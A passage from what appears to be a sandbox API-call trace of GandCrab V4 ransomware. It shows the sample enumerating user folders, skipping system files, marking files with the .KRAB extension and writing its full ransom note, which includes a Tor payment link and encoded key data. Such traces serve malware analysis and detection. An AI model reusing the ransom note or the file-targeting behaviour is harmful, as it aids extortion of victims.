dwFreeType=0x8000) returned 1 [0100.450] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.450] FindNextFileW (in: hFindFile=0xfbdfe0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0100.450] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0100.450] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0100.450] lstrcatW (in: lpString1="C:\\Users\\Default\\Downloads\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\Default\\Downloads\\KRAB-DECRYPT.txt") returned="C:\\Users\\Default\\Downloads\\KRAB-DECRYPT.txt" [0100.450] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.450] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\Default\\Downloads\\KRAB-DECRYPT.txt.KRAB") returned 48 [0100.450] lstrlenW (lpString="C:\\Users\\Default\\Downloads\\KRAB-DECRYPT.txt") returned 43 [0100.450] lstrlenW (lpString=".txt") returned 4 [0100.450] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0100.451] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0100.451] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.451] lstrlenW (lpString="C:\\Users\\Default\\Downloads\\KRAB-DECRYPT.txt") returned 43 [0100.451] lstrlenW (lpString="C:\\Users\\Default\\Downloads\\KRAB-DECRYPT.txt") returned 43 [0100.451] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0100.451] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0100.451] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0100.451] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0100.451] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0100.451] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0100.451] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0100.451] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0100.451] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0100.451] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0100.451] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.451] FindNextFileW (in: hFindFile=0xfbdfe0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 0 [0100.451] FindClose (in: hFindFile=0xfbdfe0 | out: hFindFile=0xfbdfe0) returned 1 [0100.451] CloseHandle (hObject=0x320) returned 1 [0100.451] FindNextFileW (in: hFindFile=0xfbe0e0, lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 1 [0100.451] lstrcmpW (lpString1="Favorites", lpString2=".") returned 1 [0100.451] lstrcmpW (lpString1="Favorites", lpString2="..") returned 1 [0100.451] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Favorites" | out: lpString1="C:\\Users\\Default\\Favorites") returned="C:\\Users\\Default\\Favorites" [0100.451] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Favorites\\") returned="C:\\Users\\Default\\Favorites\\" [0100.452] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0100.452] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0100.452] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0100.452] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0100.452] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0100.452] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.452] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.452] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\Default\\Favorites\\\\KRAB-DECRYPT.txt") returned 44 [0100.452] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\default\\favorites\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0100.453] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0100.453] WriteFile (in: hFile=0x320, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338f220, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338f220*=0x1f6e, lpOverlapped=0x0) returned 1 [0100.454] CloseHandle (hObject=0x320) returned 1 [0100.454] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.455] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.455] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x2f, wMilliseconds=0x28d)) [0100.455] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0100.455] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0100.456] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0100.456] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Default\\Favorites\\d2ca4a08d2ca4dee3d.lock") returned 50 [0100.456] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\default\\favorites\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x320 [0100.459] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.459] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.459] lstrlenW (lpString="C:\\Users\\Default\\Favorites\\") returned 27 [0100.459] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\Favorites\\*") returned="C:\\Users\\Default\\Favorites\\*" [0100.459] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Favorites\\*", lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 0xfbe0a0 [0100.459] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0100.459] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0100.459] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0100.459] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0100.459] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0100.459] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0100.459] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0100.459] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\Default\\Favorites\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\Default\\Favorites\\d2ca4a08d2ca4dee3d.lock" [0100.459] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.460] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\Default\\Favorites\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 55 [0100.460] lstrlenW (lpString="C:\\Users\\Default\\Favorites\\d2ca4a08d2ca4dee3d.lock") returned 50 [0100.460] lstrlenW (lpString=".lock") returned 5 [0100.460] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0100.460] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0100.460] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.460] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.460] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0100.460] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0100.460] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0100.460] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\Default\\Favorites\\KRAB-DECRYPT.txt") returned="C:\\Users\\Default\\Favorites\\KRAB-DECRYPT.txt" [0100.460] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.461] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\Default\\Favorites\\KRAB-DECRYPT.txt.KRAB") returned 48 [0100.461] lstrlenW (lpString="C:\\Users\\Default\\Favorites\\KRAB-DECRYPT.txt") returned 43 [0100.461] lstrlenW (lpString=".txt") returned 4 [0100.461] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0100.461] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0100.461] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.461] lstrlenW (lpString="C:\\Users\\Default\\Favorites\\KRAB-DECRYPT.txt") returned 43 [0100.461] lstrlenW (lpString="C:\\Users\\Default\\Favorites\\KRAB-DECRYPT.txt") returned 43 [0100.461] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0100.461] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0100.461] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0100.461] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0100.461] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0100.461] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0100.461] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0100.461] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0100.461] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0100.461] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0100.461] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.462] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 0 [0100.462] FindClose (in: hFindFile=0xfbe0a0 | out: hFindFile=0xfbe0a0) returned 1 [0100.462] CloseHandle (hObject=0x320) returned 1 [0100.462] FindNextFileW (in: hFindFile=0xfbe0e0, lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 1 [0100.462] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0100.462] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0100.462] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\Default\\KRAB-DECRYPT.txt") returned="C:\\Users\\Default\\KRAB-DECRYPT.txt" [0100.462] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.463] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\Default\\KRAB-DECRYPT.txt.KRAB") returned 38 [0100.463] lstrlenW (lpString="C:\\Users\\Default\\KRAB-DECRYPT.txt") returned 33 [0100.463] lstrlenW (lpString=".txt") returned 4 [0100.463] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0100.463] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0100.463] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.463] lstrlenW (lpString="C:\\Users\\Default\\KRAB-DECRYPT.txt") returned 33 [0100.463] lstrlenW (lpString="C:\\Users\\Default\\KRAB-DECRYPT.txt") returned 33 [0100.463] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0100.463] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0100.463] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0100.463] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0100.463] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0100.463] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0100.463] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0100.463] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0100.463] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0100.464] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0100.464] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.464] FindNextFileW (in: hFindFile=0xfbe0e0, lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 1 [0100.464] lstrcmpW (lpString1="Links", lpString2=".") returned 1 [0100.464] lstrcmpW (lpString1="Links", lpString2="..") returned 1 [0100.464] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Links" | out: lpString1="C:\\Users\\Default\\Links") returned="C:\\Users\\Default\\Links" [0100.464] lstrcatW (in: lpString1="C:\\Users\\Default\\Links", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Links\\") returned="C:\\Users\\Default\\Links\\" [0100.464] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0100.464] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0100.464] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0100.464] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0100.464] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0100.464] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.464] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.464] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\Default\\Links\\\\KRAB-DECRYPT.txt") returned 40 [0100.465] CreateFileW (lpFileName="C:\\Users\\Default\\Links\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\default\\links\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0100.465] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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